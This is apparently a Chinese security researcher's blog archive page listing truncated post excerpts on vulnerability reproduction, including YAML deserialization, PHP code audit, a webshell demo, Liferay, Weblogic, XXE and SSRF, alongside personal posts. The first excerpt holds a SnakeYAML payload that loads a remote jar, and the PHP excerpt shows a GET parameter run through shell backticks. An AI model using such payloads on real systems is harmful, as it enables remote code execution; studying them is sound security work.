- 博客(42)
- 资源 (4)
- 收藏
- 关注
原创 yaml反序列化
Yaml反序列化payloads1:!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]]]payloads2: 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。!<tag:yaml.org,2002:javax.script.Scri
2020-11-23 00:05:02
2288
1
原创 PHP代码审计
PHP代码审计RCE反引号中包括变量<?php$varch = $_GET['hi'];$output = `$varch`;echo "<pre>$output</pre>";?>array_map()中包含变量作用是为数组的每个元素应用回调函数 。其返回值为数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。<?php$arra
2020-11-23 00:02:06
600
原创 404 WebshellDemo
404 webshell Demopackage controller;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import javax.servlet.http.HttpServletRequest;i...
2020-09-28 11:30:14
296
原创 java-web安全——RandomAccessFile 和 FileSystemProvider文件读写
package com.his;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.IOException;import java.io.RandomAccessFile;import java.nio.file.Files;import java.nio.file.Path;import ...
2020-04-25 22:02:03
497
原创 liferay CVE-2020-7961 漏洞回显
liferay CVE-2020-7961 漏洞回显import com.liferay.portal.kernel.security.access.control.AccessControlUtil;import com.liferay.portal.kernel.security.auth.AccessControlContext;import javax.servlet.http.H...
2020-04-22 17:32:04
1797
原创 idea搜索 matches limit
idea搜索 matches limit 默认显示100,可通过如下限制,增加搜索返回内容help ——> find Action ——> 输入 Registry ——> 找到 ide.usages.page.size ,修改
2020-04-21 08:49:19
477
原创 EBS远程调试
EBS远程调试/u01/install/APPS/inst/apps/EBSDB_ebs/ora/10.1.3/opmn/conf/opmn.xml
2020-04-21 08:29:50
188
原创 Fel表达式注入
Fel表达式注入命令执行Demopackage com.his;import com.greenpineyu.fel.Expression;import com.greenpineyu.fel.FelEngine;import com.greenpineyu.fel.FelEngineImpl;import com.greenpineyu.fel.context.FelContext;...
2020-03-31 22:05:42
1559
原创 SSRF for DNSLOG
SSRF for DNSLOG#encoding=gbkimport urllib2import threadingimport Queueimport jsonimport sysimport osimport relock = threading.Lock()header = {"Content-type": "application/x-www-form-urlencod...
2019-01-13 00:14:30
1206
原创 URL中与SSRF相关的字段
URL中与SSRF相关的字段 relativePath url site path message=[img]http://myserver/wshell.php?logo.jpg[/img] query src src_url sr id vtTopicId //ebs operator(weblogic:SearchPublicRegistries) inputFi...
2019-01-12 00:03:50
447
转载 与浏览器交互
与浏览器交互# -*-coding:utf-8 -*-import randomimport reimport time# 图片转换import base64from bs4 import BeautifulSoupimport PIL.Image as imagefrom selenium import webdriverfrom selenium.webdriver i...
2019-01-02 22:26:00
570
原创 批量获取URL对应的IP
批量获取URL对应的IP#codeing:utf-8import urllibimport reimport sysimport osimport socketimport threadingimport Queueimport csvTHREAD_NUM = 20def readUrl(file): urllist = list() if os.pa...
2018-12-31 05:23:41
1305
原创 python学习 - 下载网页内所有的图片
下载网页内所有的图片#codeing:utf-8import urllibimport reimport sysimport osurl = 'http://tieba.baidu.com/p/1753935195'# with open('F:\hack\python\python_project\html\htmlpage.html', 'w') as f:# f...
2018-12-31 02:42:10
1862
原创 python学习 - 抓取网页内所有的URL
抓取网页内所有的URL#codeing:utf-8import urllibimport reimport sysimport osprint u'please enter the target url:',url = raw_input()if url: passelse: url = 'http://tieba.baidu.com/p/1753935195...
2018-12-31 02:41:04
945
原创 Fiddler抓包Android 模拟器应用
第一次测试安卓应用,环境不允许使用真机,于是在电脑上安装了个安卓模拟器测试安卓应用,在抓包的时候遇到了点儿问题,网上的资料都是配置模拟器里面的wifi,但效果不理想,总是失败,后面找到了一个别的方式,可以抓浏览器以及应用的流量,所以记录一下。官网下载android Studio, 安装AVD(Android Virtual Device Manager)花了一点时间,主要是网速慢,下载时间长。...
2018-08-24 16:46:58
2030
原创 S2-057 本地复现
下午正不慌不忙测着我的安卓应用呢,突然爆了个Struts2漏洞,心里咯噔一下,不会吧,上个月工作汇报还在吹水Struts2在升级OGNL后,很难由于不正当OGNL解析造成任意命令执行了。原文见:https://blog.csdn.net/u013224189/article/details/81091874怀着不安的心情,看了下漏洞信息,踏马的,还真是这个地方。Struts2 7月份升级...
2018-08-23 14:36:30
2490
原创 下一个方向,移动安全?
又有一段时间没有更新博客了,自从接触工作项目,倒是把时间都投入到了工作上面。这本是不错的状态,可最近我发现,我在挑自己熟悉的事情做,比如web渗透,虽然每周能找出一些问题,但技术上没有什么长进,都是用的“老路子”,让人可怕的是,我习惯了这种“老路子”。在目前的公司里,只会一种技能在一个领域是远远不够的,如果我要突出,就必须扩展或者突破,而不能享受这种“轻松”,正好公司提倡全面发展,那么我除了w...
2018-08-20 20:19:57
342
原创 CVE-2018-2894 weblogic 任意文件上传漏洞复现
CVE-2018-2894 weblogic任意文件上传漏洞2018年7月19日,CNCERT发出漏洞预警,weblogic存在远程代码执行高危漏洞,本质上为任意文件上传漏洞,有两处上传点:/ws_utc/config.do/ws_utc/begin.do影响版本:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。 漏洞作者就是我的小基友,所以我 来尝试复...
2018-07-25 19:43:22
3625
原创 OGNL表达式注入漏洞要成为过去了吗?
起因Struts2今年来爆出一系列安全漏洞,以至于在官方release页面,还专门罗列了各个版本对应的CVE漏洞,也算是一大奇观。![struts_release](https://img-blog.csdn.net/20180716180339458?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTMyMjQxODk=/font/5a6...
2018-07-18 08:55:08
8599
原创 微信支付SDK XXE漏洞 验证复现
今天公司收到漏洞预警,微信支付SDK存在XXE漏洞,下载到本地验证了一下漏洞信息来源http://seclists.org/fulldisclosure/2018/Jul/3https://xz.aliyun.com/t/2426漏洞描述微信支持提供了一个接口,供商家接收异步支付结果,微信支付所用的java sdk在处理结果时可能触发一个XXE漏洞,攻击者可以向这...
2018-07-03 18:08:08
12216
原创 小白上路_spring-security-oauth2 RCE复现分析
小白上路_spring-security-oauth2 RCE复现分析首先高兴的宣布,CVE-2018-1260这个漏洞复现成功,弹出了windows可爱的计算器然后就狠狠的抽自己一巴掌,讲述一下自己怎么把它折腾出来的。关于CVE-2018-1260一个标准的由于spring将不可信数据当作SPEL表达式直接解析导致的RCE漏洞影响范围Spring Securit...
2018-06-29 14:15:25
1113
原创 欢迎使用CSDN-markdown编辑器
缥缈最近为房子的事儿烦闷,可能只有CSDN这个地方能让我自由的吐出我的心声吧。 为了生活与工作能够很好的结合,我们选择定居在广州这个地方,唯一一个房价不恐怖的一线城市,不过这个“不恐怖”只是相对来说。于我而言,真的是一座横亘在面前的大山。我的父母皆来自农村,虽然很早就借着改革的风潮“下海”打工,不过淳朴的他们始终未能在沿海站稳脚跟。为了我和姐姐的学习,他们每个月省吃俭用,把存下来的钱寄给在家乡上学
2016-08-24 11:15:02
372
原创 “一日游”
最近因为工作经常上演一日游,这个过程真的很痛苦。基本上都是今天从北京去某地,第二天从某地回北京。一天中可能12个小时在路上,8个小时在酒店,还有4个小时在客户现场。 昨天在机场和小伙伴谈起买房、结婚,一肚子的负能量相互发泄,真过瘾。爽归爽,抛开绝望,生活还是得继续。把所有的不甘和委屈都化为动力,共勉。
2016-01-22 09:58:08
455
原创 崩溃的公司网络
CSDN有选择性的屏蔽了公司网络,忧桑。 最近这两个月很惆怅,几乎每周都出差,身体累倒是其次,主要是觉得时间都浪费在路途了。 马上就过春节了,希望本周出差后可以好好休息,认真迎接久违的春节。
2016-01-18 17:16:18
501
原创 CSDN markdown 常用快捷键
快捷键加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl + Q 插入链接 Ctrl + L 插入代码 Ctrl + K 插入图片 Ctrl + G 提升标题 Ctrl + H 有序列表 Ctrl + O 无序列表 Ctrl + U 横线 Ctrl + R 撤销 Ctrl + Z 重做 Ctrl + YMarkdown目录 [toc]
2015-11-02 18:23:00
452
转载 web应用想要达到完全的线程安全,需要注意哪些地方?
web应用想要达到完全的线程安全,需要注意哪些地方?关注web安全知识,正好搜到一个前辈在帖子下的答复,现记录下来,希望可以在日后用到:
2015-11-01 21:53:44
1361
原创 OWASP ZAP上手体验
新领到一个任务,试下OWASP ZAP。工具说明 ZAproxy是一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具,可以检测sql注入,跨站脚本,跨站请求伪造以及路径遍历等问题。 下载地址https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project 工具说明
2015-10-30 17:53:20
29949
1
原创 既然换上了代码安全的马甲,那就为自己加油呐喊一下吧
从事源代码静态分析一段时间了,不满足只会用工具发现问题,希望能对工具找出的问题提出自己的见解。知识在于积累。 不积跬步无以至千里,从今天起,我要坚持分享每一天的进步。
2015-10-29 18:37:47
444
转载 linux shell脚本中打开另一个终端并在新终端中执行shell脚本
gnome-terminal -t "title-name" -x bash -c "sh ./run.sh;exec bash;"-t 为打开终端的标题,便于区分。-x 后面的为要在打开的终端中执行的脚本,根据需要自己修改就行了。最后的exec bash;是让打开的终端在执行完脚本后不关闭。
2014-07-30 13:48:46
20209
1
转载 Public key for *.rpm is not installed
http://blog.sina.com.cn/s/blog_716844910100qf8t.html
2014-07-09 11:57:24
559
原创 mysql5.1数据库升级
工作需要,这次将软件工具中自带的组件mysql5.1升级到mysql5.6.按照官网提示,升级分成了两步进行。 http://dev.mysql。com/doc/refman/5.1/en/upgrading.html 1 , 从mysql5.1升级到 mysql5.52 , 从mysql5.5升级到 mysql5.6.因为是mysql是工具中带的组件,这次我选用的
2014-04-24 14:01:20
656
yaml反序化漏洞本地环境复现
2020-11-23
felDemo.rar
2020-03-31
springMVCDemo.rar
2020-03-30
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人